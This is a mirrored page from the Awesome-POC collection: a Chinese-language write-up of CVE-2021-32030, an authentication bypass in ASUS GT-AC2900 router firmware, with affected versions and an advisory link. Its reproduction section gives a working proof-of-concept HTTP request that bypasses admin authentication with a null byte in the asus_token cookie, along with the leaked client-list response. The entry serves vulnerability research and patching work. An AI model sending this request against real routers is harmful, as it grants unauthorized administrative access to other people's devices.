admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/华硕 GT-AC2900 身份验证绕过 CVE-2021-32030.md

45 lines
1.3 KiB
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# 华硕 GT-AC2900 身份验证绕过 CVE-2021-32030
## 漏洞描述
ASUS GT-AC2900管理员应用程序在处理未经身份验证的用户的远程输入时容易受到身份验证绕过漏洞的攻击从而导致对管理员界面的未经授权的访问。
参考链接:
- https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md
## 漏洞影响
```
ASUS GT-AC2900韧体版本9.0.0.4.386.41994(测试版)
ASUS GT-AC2900韧体版本3.0.0.4.386.41793(最新生产)
```
## 漏洞复现
通过在auth_check添加空字符进行绕过身份验证。
poc
```
GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Host: 192.168.1.107:8443
Content-Length: 0
User-Agent: asusrouter--
Connection: close
Referer: https://192.168.1.107:8443/
Cookie: asus_token=\0Invalid; clickedItem_tab=0
HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close
{
"get_cfg_clientlist":[{"alias":"24:4B:FE:64:37:10","model_name":"GT-AC2900","ui_model_name":"GT-AC2900","fwver":"3.0.0.4.386_41793-gdb31cdc","newfwver":"","ip":"192.168.50.1","mac":"24:4B:FE:64:37:10","online":"1","ap2g":"24:4B:FE:64:37:10","ap5g":"24:4B:FE:64:37:14","ap5g1":"","apdwb":"","wired_mac":[
...
...
}
```
Reference in New Issue Copy Permalink